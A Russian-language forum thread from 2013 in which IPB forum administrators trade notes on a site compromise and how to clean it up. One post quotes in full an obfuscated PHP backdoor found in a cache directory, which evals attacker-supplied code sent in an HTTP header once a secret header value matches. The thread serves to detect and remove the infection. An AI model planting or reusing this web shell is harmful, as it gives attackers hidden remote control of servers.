Security update
#183
Отправлено 04 Апрель 2013 - 22:00
в /uploads/monthly 03_2013 (могут оказаться и другие директории)
файлы с точно такими же именами как и jpg, но имебщие расширение .ipb
внутри файла - аналогичное говно что и в zx.php и им подобным (см в этой теме)
лечение - удалить
#184
Отправлено 08 Апрель 2013 - 09:11
#185
Отправлено 12 Май 2013 - 18:52
Заметил и у себя эту заразу - photo-128.jpg в /uploads/profile ..
Так же две таблицы заражены в бд, как и описывалось в этой теме. В директории /cache/ был файл f894eade.php , с содержанием
<?php $_d9eceec="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e";$_d9ecee="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";$_29d69c=$_d9eceec('',$_d9ecee('aWYobWQ1KCRfU0VSVkVSWydIVFRQX1FVT1RFJ10pPT0nZTY2ZTZjYWRkNmUxM2VmZWE1NGVkNTBjMGViMmQzMmInIGFuZCBpc3NldCgkX1NFUlZFUlsnSFRUUF9YX0NPREUnXSkpIEBldmFsKEBiYXNlNjRfZGVjb2RlKHN0cnJldihAJF9TRVJWRVJbJ0hUVFBfWF9DT0RFJ10pKSk7'));$_29d69c();?>
Бэкапов того времени не сохранилось что бы подменить зараженные таблицы .. Как можно поправить ситуацию?
#187
Отправлено 13 Май 2013 - 11:07
Ваше решение.
Оно не только в photo-128.jpg может быть, но и под другими названиями. Извлеките всю папку на свой пк /uploads/profile
и пробежитесь по аватарам.
#188
Отправлено 14 Май 2013 - 00:41
В директории /forum/hooks присутствует такой файл - alpha_e63f34c20c332f99431e93224eae471a.php
с содержанием -
<?php class alpha { public function getOutput() { $template = ipsRegistry::instance()->output->getTemplate('mlist')->member_alpha_ru(); $js = <<<JS <script type='text/javascript'> $('alpha_switch').observe('click', function(){ if( $('member_alpha_ru') ) { $('member_alpha').toggle(); $('member_alpha_ru').toggle(); } } ); $('alpha_switch_en').observe('click', function(){ if( $('member_alpha') ) { $('member_alpha').toggle(); $('member_alpha_ru').toggle(); } } ); JS; if ( ord( urldecode(ipsRegistry::$request['quickjump']) ) > 90 ) { $js .= <<<JS $('member_alpha').toggle(); JS; } else { $js .= <<<JS $('member_alpha_ru').toggle(); JS; } $js .= <<<JS </script> JS; return $template . $js; } }
Это тоже оно? Вроде бы раньше не было ..
#189
Отправлено 14 Май 2013 - 01:48
photo-128.jpg и tmpgw4ia4
почистил ручками, переимпортировал все хуки и перестроил весь кэш. Пока полет нормальный.
Остались сомнения относительно alpha_e63f34c20c332f99431e93224eae471a.php.
#193
Отправлено 23 Май 2013 - 01:17
#195
Отправлено 23 Май 2013 - 16:17
Атаман 23 Май 2013 - 05:23 сказал(а):
Сразу же сменил. Удивило то, что почти у всех к кому приходили "гости" - форум IPB 3.*.* и один и тот же IP в журналах авторизации АЦ. Бот видит только отображаемое имя, его и вводит при попытке авторизоваться.
Сообщение изменено: Minnow (23 Май 2013 - 16:19)
- ← Покупка лицензии IPB 3.4
- Дискуссионный клуб. Споры на тему IPB
- Апгрейд лицензии и смена домена (IPB 3.4.6) →